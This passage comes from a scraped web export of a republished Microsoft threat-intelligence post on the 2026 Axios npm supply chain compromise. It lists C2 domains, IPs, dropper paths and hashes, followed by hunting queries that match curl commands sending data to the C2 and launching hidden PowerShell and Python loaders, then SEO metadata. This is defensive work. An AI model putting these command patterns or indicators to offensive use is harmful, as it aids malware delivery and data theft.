readability=\"3\">\n<td><code><em>Sfrclak[.]com<\/em><\/code><em><\/em><\/td>\n<td>C2 domain<\/td>\n<td>Resolves to 142.11.206[.]73.<br \/>Registrar: NameCheap, Inc<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td><code>142.11.206[.]73<\/code><\/td>\n<td>C2 IP<\/td>\n<td>Sapphire Sleet C2 IP.<br \/>Port 8000, HTTP<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><code><em>hxxp:\/\/sfrclak[.]com:8000\/6202033<\/em><\/code><em><\/em><\/td>\n<td>C2 URL<\/td>\n<td>Static path across all variants<\/td>\n<\/tr>\n<tr>\n<td><code><em>%TEMP%\\6202033.vbs<\/em><\/code><em><\/em><\/td>\n<td>Windows VBScript dropper<\/td>\n<td>Created by <code>node <em>setup.js<\/em><\/code><\/td>\n<\/tr>\n<tr readability=\"6\">\n<td><code><em>%TEMP%\\6202033.ps1<\/em><\/code><\/td>\n<td>Windows PowerShell payload<\/td>\n<td>Downloaded from C2, self-deleting <br \/>SHA-256: ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a6389296637d5f815c <br \/>SHA-256: 617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><em>%PROGRAMDATA%\\system.bat<\/em><code><\/code><\/td>\n<td>File created by PowerShell<\/td>\n<td>SHA-256: f7d335205b8d7b20208fb3ef93ee6dc817905dc3ae0c10a0b164f4e7d07121cd<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td><code><em>C:\\ProgramData\\wt.exe<\/em><\/code><em><\/em><\/td>\n<td>Windows LOLBin<\/td>\n<td>Windows Terminal copy, used as PowerShell proxy<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><code><em>\/Library\/Caches\/com.apple.act.mond<\/em><\/code><em><\/em><\/td>\n<td>macOS binary<\/td>\n<td>SHA-256: <code>92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a<\/code><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><code><em>\/tmp\/ld.py<\/em><\/code><em><\/em><\/td>\n<td>Linux loader<\/td>\n<td>SHA-256: <code>fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf<\/code><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><code>packages.npm.org\/product1<\/code><\/td>\n<td>npm identifier (Windows)<\/td>\n<td>Sent as POST body to C2<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><code>packages.npm.org\/product0<\/code><\/td>\n<td>npm identifier (macOS)<\/td>\n<td>Sent as POST body to C2<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<h2 class=\"wp-block-heading\" id=\"hunting-queries\">Hunting queries<\/h2>\n<h3 class=\"wp-block-heading\" id=\"microsoft-defender-xdr\">Microsoft Defender XDR<\/h3>\n<p class=\"wp-block-paragraph\">Microsoft Defender XDR customers can run the following <a href=\"https:\/\/learn.microsoft.com\/defender-xdr\/advanced-hunting-overview\">advanced hunting<\/a> queries to find related activity in their networks:<\/p>\n<p class=\"wp-block-paragraph\"><strong>Installed Node.js packages with malicious versions<\/strong><\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"9\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\nDeviceTvmSoftwareInventory\n| where (SoftwareName has \"axios\" and SoftwareVersion in (\"1.14.1\", \"0.30.4\")) or (SoftwareName has \"plain-crypto-js\" and SoftwareVersion == \"4.2.1\")\n<\/pre>\n<\/div>\n<p class=\"wp-block-paragraph\"><strong>Detect the RAT dropper and subsequent download and execution<\/strong><\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"11\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\nCloudProcessEvents\n| where ProcessCurrentWorkingDirectory endswith '\/node_modules\/plain-crypto-js' and (ProcessCommandLine has_all ('plain-crypto-js','node setup.js')) or ProcessCommandLine has_all ('\/tmp\/ld.py','sfrclak.com:8000')\n<\/pre>\n<\/div>\n<p class=\"wp-block-paragraph\"><strong>Connection to known C2<\/strong><\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"8\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\nDeviceNetworkEvents\n| where Timestamp &gt; ago(2d)\n| where RemoteUrl contains \"sfrclak.com\"\n| where RemotePort == \"8000\"\n<\/pre>\n<\/div>\n<p class=\"wp-block-paragraph\"><strong>Curl execution to download the backdoor<\/strong><\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"25\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\nDeviceProcessEvents | where Timestamp &gt; ago(2d) | where (FileName =~ \"cmd.exe\" and ProcessCommandLine has_all (\"curl -s -X POST -d\", \"packages.npm.org\", \"-w hidden -ep\", \".ps1\", \"&amp; del\", \":8000\")) or (ProcessCommandLine has_all (\"curl\", \"-d packages.npm.org\/\", \"nohup\", \".py\", \":8000\/\", \"&gt; \/dev\/null 2&gt;&amp;1\") and ProcessCommandLine contains \"python\") or (ProcessCommandLine has_all (\"curl\", \"-d packages.npm.org\/\", \"com.apple.act.mond\", \"http:\/\/\",\":8000\/\", \"&amp;&gt; \/dev\/null\"))\n<\/pre>\n<\/div>\n<h3 class=\"wp-block-heading\" id=\"microsoft-sentinel\">Microsoft Sentinel<\/h3>\n<p class=\"wp-block-paragraph\">Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u2018TI map\u2019) to automatically match the indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the&nbsp;<a href=\"https:\/\/learn.microsoft.com\/azure\/sentinel\/sentinel-solutions-deploy\">Microsoft Sentinel Content Hub<\/a>&nbsp;to have the analytics rule deployed in their Sentinel workspace.<\/p>\n<p class=\"wp-block-paragraph\">The following queries use&nbsp;<a href=\"https:\/\/learn.microsoft.com\/azure\/sentinel\/normalization\">Sentinel Advanced Security Information Model (ASIM) functions<\/a>&nbsp;to hunt threats across both Microsoft first-party and third-party data sources. ASIM also supports deploying parsers to specific workspaces&nbsp;<a href=\"https:\/\/aka.ms\/DeployASIM\">from GitHub<\/a>, using an ARM template or manually.<\/p>\n<p class=\"wp-block-paragraph\"><strong>Detect network IP and domain indicators of compromise using ASIM<\/strong><\/p>\n<p class=\"wp-block-paragraph\">The following query checks IP addresses and domain IOCs across data sources supported by ASIM network session parser.<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"19\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\n\/\/IP list and domain list- _Im_NetworkSession\nlet lookback = 30d;\nlet ioc_ip_addr = dynamic(['142.11.206.73']);\nlet ioc_domains = dynamic([\"http:\/\/sfrclak.com:8000\", \"http:\/\/sfrclak.com\"]);\n_Im_NetworkSession(starttime=todatetime(ago(lookback)), endtime=now())\n| where DstIpAddr in (ioc_ip_addr) or DstDomain has_any (ioc_domains)\n| summarize imNWS_mintime=min(TimeGenerated), imNWS_maxtime=max(TimeGenerated), EventCount=count() by SrcIpAddr, DstIpAddr, DstDomain, Dvc, EventProduct, EventVendor\n<\/pre>\n<\/div>\n<p class=\"wp-block-paragraph\"><strong>Detect Web Sessions IP and domain indicators of compromise using ASIM<\/strong><\/p>\n<p class=\"wp-block-paragraph\">The following query checks IP addresses, domains, and file hash IOCs across data sources supported by ASIM web session parser.<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"19\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\n\/\/IP list - _Im_WebSession\nlet lookback = 30d;\nlet ioc_ip_addr = dynamic(['142.11.206.73']);\n_Im_WebSession(starttime=todatetime(ago(lookback)), endtime=now())\n| where DstIpAddr in (ioc_ip_addr)\n| summarize imWS_mintime=min(TimeGenerated), imWS_maxtime=max(TimeGenerated), EventCount=count() by SrcIpAddr, DstIpAddr, Url, Dvc, EventProduct, EventVendor \/\/ Domain list - _Im_WebSession\nlet ioc_domains = dynamic([\"http:\/\/sfrclak.com:8000\", \"http:\/\/sfrclak.com\"]);\n_Im_WebSession (url_has_any = ioc_domains)\n<\/pre>\n<\/div>\n<h3 class=\"wp-block-heading\" id=\"microsoft-defender-for-cloud\">Microsoft Defender for Cloud<\/h3>\n<p class=\"wp-block-paragraph\"><strong>Possibly compromised packages<\/strong><\/p>\n<p class=\"wp-block-paragraph\">Microsoft Defender for Cloud customers can use&nbsp;<a href=\"https:\/\/learn.microsoft.com\/azure\/defender-for-cloud\/how-to-manage-cloud-security-explorer\">cloud security explorer<\/a>&nbsp;to surface possibly compromised software packages. The following screenshot represents a query that searches for container images with the <em>axios<\/em> or <em>plain-crypto-js<\/em> node packages.<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/04\/image.webp\" alt class=\"wp-image-146299 webp-format\" srcset data-orig-src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/04\/image.webp\"><\/figure>\n<h3 class=\"wp-block-heading\" id=\"threat-intelligence-reports\">Threat intelligence reports<\/h3>\n<p class=\"wp-block-paragraph\">Microsoft Defender XDR customers can use the following <a href=\"https:\/\/learn.microsoft.com\/defender-xdr\/threat-analytics\">threat analytics<\/a> reports in the Defender portal (requires license for at least one Defender XDR product) to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments:<\/p>\n<p class=\"wp-block-paragraph\">Microsoft Security Copilot customers can also use the <a href=\"https:\/\/learn.microsoft.com\/defender\/threat-intelligence\/security-copilot-and-defender-threat-intelligence?bc=%2Fsecurity-copilot%2Fbreadcrumb%2Ftoc.json&amp;toc=%2Fsecurity-copilot%2Ftoc.json#turn-on-the-security-copilot-integration-in-defender-ti\">Microsoft Security Copilot integration<\/a> in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the <a href=\"https:\/\/learn.microsoft.com\/defender\/threat-intelligence\/using-copilot-threat-intelligence-defender-xdr\">embedded experience<\/a> in the Microsoft Defender portal to get more information about this threat actor.<\/p>\n<h3 class=\"wp-block-heading\" id=\"microsoft-security-copilot\">Microsoft Security Copilot<\/h3>\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/www.microsoft.com\/en-us\/security\/business\/ai-machine-learning\/microsoft-security-copilot\">Microsoft Security Copilot<\/a> is <a href=\"https:\/\/learn.microsoft.com\/defender-xdr\/security-copilot-in-microsoft-365-defender\">embedded in Microsoft Defender<\/a> and provides security teams with AI-powered capabilities to summarize incidents, analyze files and scripts, summarize identities, use guided responses, and generate device summaries, hunting queries, and incident reports.<\/p>\n<p class=\"wp-block-paragraph\">Customers can also <a href=\"https:\/\/learn.microsoft.com\/defender-xdr\/security-copilot-agents-defender\">deploy AI agents<\/a>, including the following <a href=\"https:\/\/learn.microsoft.com\/copilot\/security\/agents-overview\">Microsoft Security Copilot agents<\/a>, to perform security tasks efficiently:<\/p>\n<p class=\"wp-block-paragraph\">Security Copilot is also available as a <a href=\"https:\/\/learn.microsoft.com\/en-us\/copilot\/security\/experiences-security-copilot\">standalone experience<\/a> where customers can perform specific security-related tasks, such as incident investigation, user analysis, and vulnerability impact assessment. In addition, Security Copilot offers <a href=\"https:\/\/learn.microsoft.com\/copilot\/security\/developer\/custom-agent-overview\">developer scenarios<\/a> that allow customers to build, test, publish, and integrate AI agents and plugins to meet unique security needs.<\/p>\n<h3 class=\"wp-block-heading\" id=\"learn-more\">Learn more<\/h3>\n<p class=\"wp-block-paragraph\">For the latest security research from the Microsoft Threat Intelligence community, check out the <a href=\"https:\/\/aka.ms\/threatintelblog\">Microsoft Threat Intelligence Blog<\/a>.<\/p>\n<p class=\"wp-block-paragraph\">To get notified about new publications and to join discussions on social media, follow us on <a href=\"https:\/\/www.linkedin.com\/showcase\/microsoft-threat-intelligence\">LinkedIn<\/a>, <a href=\"https:\/\/x.com\/MsftSecIntel\">X (formerly Twitter)<\/a>, and <a href=\"https:\/\/bsky.app\/profile\/threatintel.microsoft.com\">Bluesky<\/a>.<\/p>\n<p class=\"wp-block-paragraph\">To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the <a href=\"https:\/\/thecyberwire.com\/podcasts\/microsoft-threat-intelligence\">Microsoft Threat Intelligence podcast<\/a>.<\/p>\n<p>READ MORE <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/04\/01\/mitigating-the-axios-npm-supply-chain-compromise\/\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>On March 31, 2026, the popular HTTP client Axios experienced a supply chain attack, causing two newly published npm packages for version updates to download from command and control (C2) that Microsoft Threat Intelligence has attributed to the North Korean state actor Sapphire Sleet. Although the malicious versions are no longer available for download, since Axios is one of the most widely used HTTP clients in the JavaScript ecosystem, this compromise exposed hundreds to potentially millions of users.<br \/>\nThe post Mitigating the Axios npm supply chain compromise appeared first on Microsoft Security Blog. READ MORE HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[276],"tags":[493,1247,10754,357],"class_list":["post-60413","post","type-post","status-publish","format-standard","hentry","category-microsoft-secure","tag-linux","tag-macos","tag-sleet","tag-windows"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Mitigating the Axios npm supply chain compromise 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Mitigating the Axios npm supply chain compromise 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-01T21:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"432\" \/>\n\t<meta property=\"og:image:height\" content=\"435\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"20 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Mitigating the Axios npm supply chain compromise\",\"datePublished\":\"2026-04-01T21:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/\"},\"wordCount\":3448,\"publisher\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/04\/image.webp\",\"keywords\":[\"Linux\",\"macOS\",\"Sleet\",\"Windows\"],\"articleSection\":[\"Microsoft Secure\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/\",\"url\":\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/\",\"name\":\"Mitigating the Axios npm supply chain compromise 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/04\/image.webp\",\"datePublished\":\"2026-04-01T21:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#primaryimage\",\"url\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/04\/image.webp\",\"contentUrl\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/04\/image.webp\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.threatshub.org\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Linux\",\"item\":\"https:\/\/www.threatshub.org\/blog\/tag\/linux\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Mitigating the Axios npm supply chain compromise\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#website\",\"url\":\"https:\/\/www.threatshub.org\/blog\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\/\/www.threatshub.org\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Mitigating the Axios npm supply chain compromise 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/","og_locale":"en_US","og_type":"article","og_title":"Mitigating the Axios npm supply chain compromise 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2026-04-01T21:00:00+00:00","og_image":[{"width":432,"height":435,"url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","type":"image\/jpeg"}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"20 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Mitigating the Axios npm supply chain compromise","datePublished":"2026-04-01T21:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/"},"wordCount":3448,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#primaryimage"},"thumbnailUrl":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/04\/image.webp","keywords":["Linux","macOS","Sleet","Windows"],"articleSection":["Microsoft Secure"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/","url":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/","name":"Mitigating the Axios npm supply chain compromise 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#primaryimage"},"thumbnailUrl":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/04\/image.webp","datePublished":"2026-04-01T21:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#primaryimage","url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/04\/image.webp","contentUrl":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/04\/image.webp"},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Linux","item":"https:\/\/www.threatshub.org\/blog\/tag\/linux\/"},{"@type":"ListItem","position":3,"name":"Mitigating the Axios npm supply chain compromise"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH 